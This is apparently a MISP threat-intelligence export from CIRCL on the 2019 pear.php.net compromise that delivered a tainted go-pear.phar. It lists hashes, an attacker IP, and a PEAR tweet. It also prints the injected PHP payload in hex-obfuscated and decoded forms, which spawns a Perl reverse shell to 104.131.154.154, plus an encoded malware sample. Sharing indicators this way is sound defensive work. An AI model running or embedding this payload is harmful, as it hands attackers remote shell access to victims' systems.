{
"Event" : {
"analysis" : "1" ,
"date" : "2019-01-21" ,
"extends_uuid" : "" ,
"info" : "Incident - pear.php.net - compromised and delivering malicious package" ,
"publish_timestamp" : "1548332640" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1548332586" ,
"uuid" : "5c45721d-de08-4fff-b9b0-168a02de0b81" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
} ,
{
"colour" : "#0071c3" ,
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0087e8" ,
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#ffffff" ,
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
} ,
{
"colour" : "#203f00" ,
"local" : "0" ,
"name" : "circl:incident-classification=\"system-compromise\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#00aeae" ,
"local" : "0" ,
"name" : "ecsirt:intrusions=\"compromised\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0013bb" ,
"local" : "0" ,
"name" : "europol-incident:information-security=\"unauthorized-access\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0014c5" ,
"local" : "0" ,
"name" : "europol-incident:information-security=\"unauthorized-modification\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#004e5f" ,
"local" : "0" ,
"name" : "veris:security_incident=\"Confirmed\"" ,
"relationship_type" : ""
}
] ,
"Attribute" : [
{
"category" : "Artifacts dropped" ,
"comment" : "md5sum of the infected file" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548055336" ,
"to_ids" : false ,
"type" : "md5" ,
"uuid" : "5c457328-f3c8-47bd-bfbc-201802de0b81" ,
"value" : "1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548332216" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49acb8-6624-4506-ba63-4b46950d210f" ,
"value" : "${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"ki\\x72\\x69\\x68\\x71\\x68\"]=\"st\\x72\";${${\"GLOBA\\x4c\\x53\"}[\"k\\x69ri\\x68\\x71\\x68\"]}=\"\\x75\\x73\\x65\\x20\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3b\\x0a\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x73\\x74\\x61\\x72\\x74\\x65\\x64\\x22\\x3b\\x0a\\x24\\x68\\x6f\\x73\\x74\\x20\\x3d\\x20\\x22\\x31\\x30\\x34\\x2e\\x31\\x33\\x31\\x2e\\x31\\x35\\x34\\x2e\\x31\\x35\\x34\\x22\\x3b\\x0a\\x24\\x70\\x6f\\x72\\x74\\x20\\x3d\\x20\\x34\\x34\\x33\\x3b\\x0a\\x24\\x70\\x72\\x6f\\x74\\x6f\\x20\\x3d\\x20\\x67\\x65\\x74\\x70\\x72\\x6f\\x74\\x6f\\x62\\x79\\x6e\\x61\\x6d\\x65\\x28\\x22\\x74\\x63\\x70\\x22\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x50\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x20\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x2c\\x20\\x24\\x70\\x72\\x6f\\x74\\x6f\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x6d\\x79\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x20\\x3d\\x20\\x69\\x6e\\x65\\x74\\x5f\\x61\\x74\\x6f\\x6e\\x28\\x24\\x68\\x6f\\x73\\x74\\x29\\x3b\\x0a\\x69\\x66\\x20\\x28\\x21\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x70\\x61\\x63\\x6b\\x20\\x22\\x53\\x6e\\x41\\x34\\x78\\x38\\x22\\x2c\\x20\\x32\\x2c\\x20\\x24\\x70\\x6f\\x72\\x74\\x2c\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x6e\\x6f\\x74\\x20\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x65\\x64\\x22\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x7d\\x0a\\x69\\x66\\x20\\x28\\x21\\x66\\x6f\\x72\\x6b\\x28\\x20\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x63\\x68\\x69\\x6c\\x64\\x22\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x49\\x4e\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x4f\\x55\\x54\\x2c\\x22\\x3e\\x26\\x53\\
x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x45\\x52\\x52\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x65\\x63\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x65\\x63\\x20\\x7b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x7d\\x20\\x22\\x2d\\x62\\x61\\x73\\x68\\x22\\x20\\x2e\\x20\\x22\\\\0\\x22\\x20\\x78\\x20\\x34\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x69\\x74\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x3b\\x0a\\x7d\";@exec(\"p\\x65\\x72\\x6c -e \\x27$str\\x27 \\x3e /dev/n\\x75ll\\x202\\x3e/de\\x76/\\x6e\\x75\\x6c\\x6c\");"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1548332586" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5c49ae2a-3520-4dbb-bc74-4e04950d210f" ,
"value" : "104.131.154.154"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "Microblog post like a Twitter tweet or a post on a Facebook wall." ,
"meta-category" : "misc" ,
"name" : "microblog" ,
"template_uuid" : "8ec8c911-ddbe-4f5b-895b-fbff70c42a60" ,
"template_version" : "5" ,
"timestamp" : "1548056697" ,
"uuid" : "5c4572e1-8278-4d63-ba24-196a02de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "post" ,
"timestamp" : "1548055265" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e1-5ae8-49cf-b341-196a02de0b81" ,
"value" : "A security breach has been found on the http://pear.php.net webserver, with a tainted go-pear.phar discovered. The PEAR website itself has been disabled until a known clean site can be rebuilt. A more detailed announcement will be on the PEAR Blog once it's back online."
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "type" ,
"timestamp" : "1548055266" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e2-39b0-4a44-815e-196a02de0b81" ,
"value" : "Twitter"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1548056696" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5c4572e2-6650-4473-bb22-196a02de0b81" ,
"value" : "https://twitter.com/pear/status/1086634389465956352"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "username" ,
"timestamp" : "1548055266" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c4572e2-5a7c-47bd-93db-196a02de0b81" ,
"value" : "pear"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1548055396" ,
"uuid" : "5c457364-db30-4c64-b462-299e02de0b81" ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"data" : " U E s D B B Q A C Q A I A O g 6 N U 6 L s m l 2 I k g J A G E B N w A g A B w A M W U y N m Q 5 Z G Q z M T E w Y W Y 3 O W E 5 N T k 1 Z j F h N z d h O D J k Z T d V V A k A A 2 R z R V x k c 0 V c d X g L A A E E I Q A A A A Q h A A A A r G x o A 5 q k 5 D l N Z F P G u q j L 4 O F S 3 e I X E M I O k H u k 6 C o J H o f a V L b X W u 82 t i / O Z e 7 X n / H a i g Q m K R f M Z 2 s Q N 5 G D H m 0 V F I H 3 l A d 3 P P W M d 3 M 5 b B 3 K v c P L v 8 p 9 k y i n 6 L t L l G x z b U f j 4 E I e M M J S B G 7 V m N U Z t 6 J h W 0 h X + 3 x B h N J r R 0 o + 1 m h c 6 i r h M H r / M R I d 12 q G i J p 9 z X V j 9 s x a d 746 F a 1 t E Y l m C V 7 L 7 x f 10 u U Y Y x C h l k m G f F U b d p D M U W F p Q C n N j y R 2 J d a q K D c M D W F j B z i V 1 C a L Q i U + l l W k 2 M k u s X x W Q r 94 u T 7 O 7 r W G k m 2 X J d i T u X r u z A Z G L 8 H J f t C 0 z B D F j I P 0 b e 5 z r Q 44 K 3 C P d g R d b 19 j m P m S M 0 Z u A u i K 9 / c o Q 2 t z E Z E G 0 q 206 Q I D U S r 1 I M c L m 4 u v 1 E W w t H V B 6E+8 K u s M d Q w 82 J I 2 c 4 c z v 56 Z y T J H v z Z s z q t e A t f j z J d a z u a s o e p e X e r 2 c T t p N I y 7 u C V d f d R u Z + R v I s b x D n K S g w 4 I d y Y Q B n 5 Q m Q d 5 R O 8 w z 8 N g T O f 4 i p Z M A 6 f I / 29 v A 3 C l P K N U 483 X 5 a 6 z S O h / n R s I B s a J 3 Y A Q H Z Y T r I 0 U R l N c K 9 Q P O Q Q c 3 p q 9 v 87 g v c / w 8 N 7 q r D I 4 d n z q I Y s g Q h C t y k 9 Y A R b + z w c 0 i I E 8 f h 6 g B Y C g T f 2 E X G U P f 7 j y 0 4 J W 9 U I l j j u / h s e j M c I j j E l W d T D L E y x E 93 s I 3 G D N O A j 4 y a a v k b E 0 2 u Y z h c U 8 Q a i 25 N b t K x 2 m B o 5 u G g 4 s Q D v A X k R Z 1 / 2 z r X d x r X q b Q Q L k F m K Z c X H u j g Y A U 3 l E v j n i 1 a C t U 7 z 6 g N 5 Z B A l t V P / H r G z g t F 6 w 532 d l J Z b 1 R 5 + M k r T f 3 f n F v 6 B f a t i h L 5 D R c h 8 s t p i c Q v J I g x b s n U c I h P 36 t K C U j 5 P v X q / W R W P g G 7 V h k b n 90 y P 12 J k Y q 1 
B V h / N h q 7 r 5 u M f H D G O Y O 8 i j B y z b 548 + X 4 j Q / 9 q Z M W r V d c 6 v R l O Q S W B s J F t 7 g g m W u T a z v o f M F V C y P B P z I x l 9 F s G A k X L r k i J u L F e 8 I / 9 o 9 z x / Z j y 0 E F o F s b p C L c + T / 5 j x l v 10 Z h b S d f c 63 x L u r 9 W T 5 m a I 4 T a a C P R l c Z J Z a K m R S r u F y b N C M v r i H p 31 G G M 1 x I f z K E z U 3 c 2 w P M O b G S 82 e i W 6 L n k q w w U q g O m P b C P X T s P V h u B I F + M A f A i O h R I h Z K f x s s 5 i w A 4 c 5 M L w Z q e M h Q Y w K Y t x A 4 h z 7 y n Y P 6 e O D w Y V s r y x 1 w + P I M x E o L e R l Z e c K 6 H o X F r 4 W X N z H c J 7 z R 5 k K t E 6 P Q w d A P P K / X n P D N R Q b q X T n s o k 9 s k Z 8 E c D K 1 N i P g i k U s p D Z d E 1 S k T k e L U B O 5 A L e / 2 V D V u i u T A D E G 4 H E q P P w l H L H 2 A V q Y O A o 3 B 8 H t E X X V P c h i D D t o x z 2 v 6 h 7 H Z p K Z F k 37 S 0 N 31 V L Z z m h w H 0 s 2 z 4 n 35 r j p O c u c P p K 7 r q O Z 9 u X v a D A k b n X 5 M M P Y k B O b d d d u + c S w L S h E X R F I p C B v f w U f O P B M Q h c 3 f A s L N s B i J C M V X 1 I 37 I 0 z t + X 7 H R F v 9 E x + r T 2 L Q q T / K k k I b + 7 A F r t G m e f 8 v U i X t 87 n r N 3 N s 7 K j + C 5 H Y l 0 i Q p E X f o s b v f q p X n + 4 Q x L 9 Q A J Q m G + 4 G z l a l 9 g P d G H Y / 1 U L o b k + P f m 5 o j r r Z p W K i E E e F U 2 g 3 t F P o Q 3 P i E B W B U V F X / d N v N x G G J 8e7 s y m A 8 t S W l M D 5 Y T Y d I L Y M q f / 8 Y F k h m M e W b Q a I W d Z L M j p k H / 5 f 1 X 11 G s 5 G n x r 9 / W Q Z B a t F V d z F O N X B q l c 4 + v n E V Q z s 6 O d Y O J k d R o g R N s B J a Y c s J W U / n z P o d J P 2 K i F E B a J e l u P M G j j l 0 d K O v w a m l h c K W 0 T A m 0 0 m e m y s X B k 2 L d b A f / 5 U W M D S 1 m X 53 a J i z 839 v H W x e y h q + h x 1 T G i 7 Y U y j C s 0 M B m / d y p q / W g i V G K j T G q g l G Q G 66 v T c o c a 7 U m T s b / r 1 P m 3 E C e x N o m v f U X C v o b 3 w c w s t B U c C b / 2 d 
0 7054 L t A Z 8 g 9 C q s Y w k V K a 64 o j q J q m b 1 i 4 d H 6 I G x V i N T O L 6 p 3 G 85 E O 3 g 46 O Y h L 8 o O q 4 B S T E X 4 x r 9 R J 3 i D y C + j g t l x + G o z 50 F a z a I C w F D d j X B i v O U B U V r r 6 G t z 3 b 6 J z V G 6e2 Q E B g b M V V h / r O a i I P V n P Z x M m w i w r s D A W w y K M J w t K O c 8 Q e N S q q X 9 + J H T 1 + B v c G N d w Y O u F y f + D + U N / J P 9 X 0 w H a m K H i e o L 9 y 5 s T B N 55 x n f 6 F 26 t p 0 H k 4 m J o N D J K h g I e Q u d 2 q P 4 J V 3 O u K R O i + 1 h Y 0 Z z e n q 1 l x q l Q b + h / O e T J h h 10 h F I I e S L 0 o A R 1 x / E W N r 0 7 n v y S m 4 q L 5 Z S P i c T q l 0 c P F + 2 o Y d Q m j u h u v y d 7 p j H C H T c a K 707 b M D u m C e a A c T M w g V M A Q T d 3 p g + X p k f 15 m U P 13 O y J F z j B W Y Y u + b 45 B K Z N r D m I 69 m 0 v + O n X c O d 5 t h g V Q 5 t T j D p k R S z b k Y u I S l E L a a R Z R I d L o D E G g p s g Z k L G Y A J H q a X B n X H g c 0 L a U F P V 1 + i 0 Z L 94 L e j G r S E q e Q w G W C 25 x N t h G i 20e1 t K 2 C K n V 7 U p t 7 V 7 j x L r Y a i f 
//RCL+MPubDSJ+eDHvPm2Hx01e2BmOMKrtTM7GWBw86etKatxm0I5mhmngR183kld3/edwLBUjilPr/XSLdBWrzU0wNZT31XwhhI/+6MFbrlso9h2tw8eN2I11priQcAsZOtUGrfhchmFfqVNdamsligXmpoKNXubQjvhg44wlgpiuOmAO/s+AZSK7BfPISa0dKKVD2kMnTpJTtdW7vImZYQAb+kGPSta7sRoYXAW6ZC3mxHpf+4CBaB208eCk+ltIW+N4t/nHETGDgCvWYXoMWTORjNI/KbTcLAAEPQuOUkggj71Bk4c4SYS8k5zf8GmwCVorGV3yr+8oHZsXHZXPjaJFriwk6Q8eS0lZJrTcfonr3VusYEZlVM2Ykr1vmymQXf4J6Gk1Uq9dGRFDX4VxZH2h4pZrxiqwDekmXHv9TsnzSAFQti/zF5Ym3Xu2nDAlco3v6ERQWAxoDtZiRRbz0kQcTSAhnsu1yQgZW46QT6FNkXiTqGs4zoyu8rgmf27uQs8yuxLEGTP8VfYA0F6aBHKtcm4AUGXELHG1mNodzI++DMt7G7NSLzz/7fE0TiSMMzb5+1+CWiHans70Iy3uAMNFxf+VoK8vE8pGng5497HIIZ/djvGQ707hUK1kuGpxEc9sTsRELRdxsNZ91+FqGrtHqwMOzU7aduijRwKrXu7fzlsTdDstcGDfgPNV8S66FRh9jtTkf77mpXWgK79HaBKfSsuU6JCuRJE+WRvvM6us/Bocoh6x6I1wIdaldlmWCyJD1MBYwJFnatmcbJx90UB4qCp/mou8pNdD81QHVMN8LXLDi6h881PLxhPfzzwxHWjDp8ZCa34OFldfyv+D4nrCPYXB7MWawMjAuKcJ7+NqmCi//k8jRO4pNV6JAKFvotWAM7cpuX2mcbsS97txqUgjhe+bFfGa7GlzP8CDXGStC4YYIeQLWQt3WV+jCizm9v7UJuPfFzbLtLgQX5l5mHTVFS8wnshMPibBSpsWZb1lIGkTFtbOzvNBeEr7TGdK7pd8xYlt4NSodr7bYqopWTLDROqo/BXbCbja1cyOVHu2R6um5OnbBZqYJPVy2lG8J6dWDEndJVPlJjIkj14emcwVuv8wYqh+33eKG6pOrgM8aiNyQXxh6wYJt01V/JYgGEO3jtQ8JdiehZhcrEfpGGXhWqL295TS00u3dMMw+Q0jhiLmTSKbYv+lgg6jPior9uQIswnTCEPrg0JEPzIFiyRLThX0MUYq+vK9YUlWWGwvgiSyfSaHAZrffmTDWewY0FEm29OWDJwa+NL3S47TvRQ8a7QxbgJzkSoN6PK/jLjYuESnvj8yvPE2iWU3aGYq3S3gFa+quT1KKU5EK701tx6UzRDa74Dvc7LTxzni62iq8pRkb1+sUFv33bava/ef2tTOPsiSDQ2kyL+F3xQO4nBvT8BxLpNVZdA2lSv0Ke8qK+u5IEQH/LI49Y+9GmF6lJQqJe5B09RU02V0LhdYD2g4prp7
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "malware-sample" ,
"timestamp" : "1548055397" ,
"to_ids" : true ,
"type" : "malware-sample" ,
"uuid" : "5c457365-1d88-4a27-a43f-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8|1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "filename" ,
"timestamp" : "1548055398" ,
"to_ids" : false ,
"type" : "filename" ,
"uuid" : "5c457366-e848-48cf-95e4-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1548055398" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "5c457366-e5bc-4f54-ba90-299e02de0b81" ,
"value" : "1e26d9dd3110af79a9595f1a77a82de7"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1548055399" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "5c457367-38a4-4096-b771-299e02de0b81" ,
"value" : "5b913edb2917d6b85d929659ff833e401a5cc503"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1548055399" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5c457367-2018-4084-bb83-299e02de0b81" ,
"value" : "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "size-in-bytes" ,
"timestamp" : "1548055401" ,
"to_ids" : false ,
"type" : "size-in-bytes" ,
"uuid" : "5c457369-0ad8-4031-a193-299e02de0b81" ,
"value" : "3604833"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "1" ,
"timestamp" : "1548332550" ,
"uuid" : "5c49ae06-c5a4-4838-a07e-4d35950d210f" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1548332550" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae06-6d90-4cbc-b5aa-4c31950d210f" ,
"value" : "${\"GLOBALS\"}[\"kirihqh\"]=\"str\";${${\"GLOBALS\"}[\"kirihqh\"]}=\"use Socket;\r\nprint \"started\";\r\n$host = \"104.131.154.154\";\r\n$port = 443;\r\n$proto = getprotobyname(\"tcp\") || \r\nsocket(SERVER, PF_INET, SOCK_STREAM, $proto) || \r\nmy $target = inet_aton($host);\r\nif (!connect(SERVER, pack \"SnA4x8\", 2, $port, $target)) {\r\n print \"not connected\";\r\n \r\n}\r\nif (!fork( )) {\r\n print \"child\";\r\n open(STDIN,\">&SERVER\");\r\n open(STDOUT,\">&SERVER\");\r\n open(STDERR,\">&SERVER\");\r\n print(\"exec\");\r\n exec {\"/bin/sh\"} \"-bash\\\\0\" x 4;\r\n print(\"exit\");\r\n \r\n}\";@exec(\"perl -e '$str' > /dev/null 2>/dev/null\");"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1548332552" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae08-5f08-4757-99c8-4776950d210f" ,
"value" : "PHP"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1548332552" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5c49ae08-4520-4f38-aeb9-452e950d210f" ,
"value" : "Malicious"
}
]
}
]
}
}